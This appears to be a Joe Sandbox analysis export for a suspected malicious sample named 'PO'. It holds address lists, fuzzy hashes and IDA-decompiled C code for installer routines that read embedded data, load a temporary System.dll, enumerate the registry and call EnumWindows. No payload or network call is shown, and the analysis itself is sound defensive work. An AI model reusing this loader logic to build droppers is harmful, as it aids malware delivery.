0x00406c70
0x00406c73
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c81
0x00406c83
0x00406c85
0x00406c85
0x00406c86
0x00406c89
0x00406c90
0x00406c93
0x00406ca1
0x00000000
0x00000000
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x004070c2
0x00000000
0x004070c2
0x00406f90
0x00406f93
0x00406f96
0x00406f9a
0x00406f9d
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fab
0x00406fab
0x00406fab
0x00406fae
0x00406fae
0x00406fb2
0x00407012
0x00407015
0x0040701a
0x0040701b
0x0040701d
0x0040701f
0x00407022
0x00406f2e
0x00406f2e
0x00000000
0x00406f34
0x00406f2e
0x00406fb4
0x00406fba
0x00406fbd
0x00406fc0
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd2
0x00406fd5
0x00406fee
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffb
0x00406ffd
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fdf
0x00406fe4
0x00406fe6
0x00406fe9
0x00406fe9
0x00407004
0x0040700b
0x00000000
0x0040700d
0x00000000
0x0040700d
0x00000000
0x00406ca9
0x00406cac
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00406a2b
0x00406a2b
0x00406a2f
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00000000
0x00000000
0x00406bb6
0x00406bb6
0x00406bba
0x00407080
0x00000000
0x00407080
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bec
0x00406bef
0x00406bf1
0x00406bf1
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00406bf4
0x00406bf4
0x00000000
0x00406bf4
0x00406e75
0x004070aa
0x00000000
0x00000000
0x004066d9
0x004070e1
0x004070e1
0x00000000
0x004070e1
0x00406f2e
0x00406eb5
0x00406eb2

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004031EF Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004031EF(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x418ed4; // 0x3408c
				_t34 = _t32 -  *0x40ce40 + _a4;
				 *0x42a24c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402D9F(1);
					return 0;
				}
				E0040336E( *0x418ee4);
				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
				 *0x418ee0 = _t34;
				 *0x418ed0 = 0;
				while(1) {
					_t10 =  *0x418ed8; // 0x41cdd
					_t31 = 0x4000;
					_t11 = _t10 -  *0x418ee4;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403358(0x414ed0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x418ee4 =  *0x418ee4 + _t31;
					 *0x40ce60 = 0x414ed0;
					 *0x40ce64 = _t31;
					L6:
					L6:
					if( *0x42a250 != 0 &&  *0x42a2e0 == 0) {
						_t19 =  *0x418ee0; // 0x25361
						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
						E00402D9F(0);
					}
					 *0x40ce68 = 0x40ced0;
					 *0x40ce6c = 0x8000; // executed
					_t14 = E00406697(0x40ce48); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce68; // 0x414485
					_t37 = _t36 - 0x40ced0;
					if(_t37 == 0) {
						__eflags =  *0x40ce64; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x418ed4; // 0x3408c
						if(_t16 -  *0x40ce40 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E05( *0x40a01c, 0x40ced0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce40 =  *0x40ce40 + _t37;
					_t49 =  *0x40ce64; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x004031f2
0x004031ff
0x00403212
0x00403217
0x00403347
0x00403349
0x00000000
0x0040334f
0x00403223
0x00403236
0x0040323c
0x00403242
0x0040324d
0x0040324d
0x00403252
0x00403257
0x0040325f
0x00403261
0x00403261
0x0040326a
0x00403271
0x00000000
0x00000000
0x00403277
0x0040327d
0x00403283
0x00000000
0x00403289
0x0040328f
0x00403299
0x004032af
0x004032b4
0x004032b9
0x004032bf
0x004032c5
0x004032cf
0x004032d6
0x00000000
0x00000000
0x004032d8
0x004032de
0x004032e0
0x00403303
0x00403309
0x00000000
0x00000000
0x0040330b
0x0040330d
0x00000000
0x00000000
0x0040330f
0x0040330f
0x00403322
0x00000000
0x00000000
0x00403331
0x00000000
0x00403331
0x004032ea
0x004032f1
0x0040333e
0x00403344
0x00403344
0x00000000
0x00403344
0x004032f3
0x004032f9
0x004032ff
0x00000000
0x00000000
0x00000000
0x00403342
0x00403342
0x00000000
0x00403342
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403203

Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
SetFilePointer.KERNELBASE(0003408C,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401FC3(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2f8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402BBF(0xfffffff0);
				 *((intOrPtr*)(_t39 - 8)) = E00402BBF(1);
				if( *((intOrPtr*)(_t39 - 0x1c)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004065C7( *(_t39 + 8),  *((intOrPtr*)(_t39 - 8)));
					if(_t38 == _t32) {
						E004052DD(0xfffffff7,  *((intOrPtr*)(_t39 - 8)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x24)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 0xc)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x24)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x20)) == _t32 && E00403967( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401fc3
0x00401fc3
0x00401fc8
0x00401fcf
0x0040208e
0x004021dc
0x004021dc
0x00402a4c
0x00402a4f
0x00402a5b
0x00402a5b
0x00401fde
0x00401fe8
0x00401feb
0x00401ffb
0x00401fff
0x00402007
0x0040200a
0x00402087
0x00000000
0x00402087
0x0040200c
0x00402017
0x0040201b
0x0040205b
0x0040201d
0x00402020
0x00402023
0x0040204f
0x00402025
0x00402028
0x00402031
0x00402033
0x00402033
0x00402031
0x00402023
0x00402063
0x0040207c
0x0040207c
0x00000000
0x00402063
0x00401fee
0x00401ff6
0x00401ff9
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004052DD: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
Part of subcall function 004052DD: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00402E19), ref: 00405338
Part of subcall function 004052DD: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll), ref: 0040534A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: ffe8eb7601d8803f9210ac34113d856d3215e5729ed24176a0018f2e9fe48fdd
Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
Opcode Fuzzy Hash: ffe8eb7601d8803f9210ac34113d856d3215e5729ed24176a0018f2e9fe48fdd
Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040249E(int* __ebx, short* __esi) {
				void* _t7;
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				short* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t7 = E00402CC9(_t25, 0x20019); // executed
				_t18 = _t7;
				_t8 = E00402BA2(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x1c)) == __ebx) {
						_t11 = RegEnumValueW(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyW(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x0040249e
0x0040249e
0x004024a3
0x004024aa
0x004024ac
0x004024b3
0x004024b6
0x0040281e
0x0040281e
0x004024bc
0x004024c4
0x004024c7
0x004024e0
0x004024e6
0x004024e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004024c9
0x004024cd
0x004024ee
0x004024ee
0x004024f5
0x004024f6
0x004024f6
0x004024c7
0x00402a4f
0x00402a5b

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00001106,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr9735.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 7e3dc66a0c4e4db4557e30390ba759ccf808f2377b82121fb7e316e2894b98b5
Instruction ID: c7ec42ec2a5b8cbcf97019b844e04a4f9c539befeef3331d530b96059407f5ff
Opcode Fuzzy Hash: 7e3dc66a0c4e4db4557e30390ba759ccf808f2377b82121fb7e316e2894b98b5
Instruction Fuzzy Hash: FCF03171A14204EBEB209F65DE8CABF767DEF80354B10843FF505B61D0DAB84D419B69

Uniqueness

Uniqueness Score: -1.00%

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E100028A4(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004050 != 0 && E10002823(_a4) == 0) {
					 *0x10004054 = _t106;
					if( *0x1000404c != 0) {
						_t106 =  *0x1000404c;
					} else {
						E10002DE0(E1000281D(), __ecx);
						 *0x1000404c = _t106;
					}
				}
				_t31 = E1000285F(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E10002853();
					_t81 = _a4;
					_t90 =  *0x10004058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004058 = _t81;
					E1000284D();
					_t36 = EnumWindows(??, ??); // executed
					 *0x10004034 = _t36;
					 *0x10004038 = _t90;
					if( *0x10004050 != 0 && E10002823( *0x10004058) == 0) {
						 *0x1000404c = _t107;
						_t107 =  *0x10004054;
					}
					_t91 =  *0x10004058;
					_a4 = _t91;
					 *0x10004058 =  *((intOrPtr*)(E10002853() + _t91));
					_t40 = E10002831(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000285F(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E1000286A() + _a4 + _v8);
							_push(E10002874());
							if( *0x10004050 <= 0 || E10002823(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004058 == 0) {
						 *0x1000404c = 0;
					}
					_t94 = _a4 + E1000286A();
					 *(E10002878() + _t94) =  *0x10004034;
					 *((intOrPtr*)(E1000287C() + _t94)) =  *0x10004038;
					E1000288C(_a4);
					if(E1000283F() != 0) {
						 *0x10004068 = GetLastError();
					}
					return _a4;
				}
				_push(E1000286A() + _a4);
				_t65 = E10002870();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E1000287C();
				_t100 = E10002878();
				_t103 = E10002874();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100028b4
0x100028c5
0x100028d2
0x100028e6
0x100028d4
0x100028d9
0x100028de
0x100028de
0x100028d2
0x100028ef
0x100028f4
0x100028fa
0x1000293e
0x1000293e
0x10002943
0x10002948
0x1000294e
0x10002950
0x10002956
0x10002963
0x10002965
0x1000296a
0x10002977
0x1000298a
0x10002990
0x10002996
0x10002997
0x1000299d
0x100029a9
0x100029af
0x100029b7
0x100029b8
0x100029bb
0x100029c6
0x100029c8
0x100029d4
0x100029da
0x100029e2
0x10002a0e
0x10002a0f
0x10002a15
0x10002a15
0x10002a1c
0x100029f2
0x100029f2
0x100029f3
0x10002a01
0x10002a0a
0x10002a0a
0x100029e2
0x100029c6
0x10002a25
0x10002a27
0x10002a27
0x10002a39
0x10002a46
0x10002a54
0x10002a5a
0x10002a68
0x10002a70
0x10002a70
0x10002a7e
0x10002a7e
0x10002905
0x10002906
0x1000290b
0x1000290f
0x10002914
0x10002928
0x10002929
0x1000292a
0x1000292c
0x10002931
0x10002933
0x10002933
0x10002936
0x1000293c
0x00000000

APIs

EnumWindows.USER32(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004030E7 Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004030E7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a298;
					 *0x418ed4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004031EF(4);
				if(_t22 >= 0) {
					_t24 = E00405DD6( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x418ed4 =  *0x418ed4 + 4;
						_t36 = E004031EF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x418ed4 =  *0x418ed4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405DD6( *0x40a01c, 0x414ed0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405E05(_a8, 0x414ed0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x418ed4 =  *0x418ed4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x004030eb
0x004030f4
0x004030fd
0x00403101
0x0040310c
0x0040310c
0x00403114
0x0040311b
0x0040312d
0x00403134
0x004031d9
0x004031d9
0x00000000
0x0040313a
0x0040313d
0x00403149
0x0040314d
0x004031e7
0x004031e7
0x00403153
0x00403156
0x004031b5
0x004031bb
0x004031bd
0x004031bd
0x004031cf
0x004031d7
0x004031de
0x004031e1
0x00000000
0x00000000
0x00000000
0x00000000
0x00403158
0x0040315b
0x00000000
0x00403161
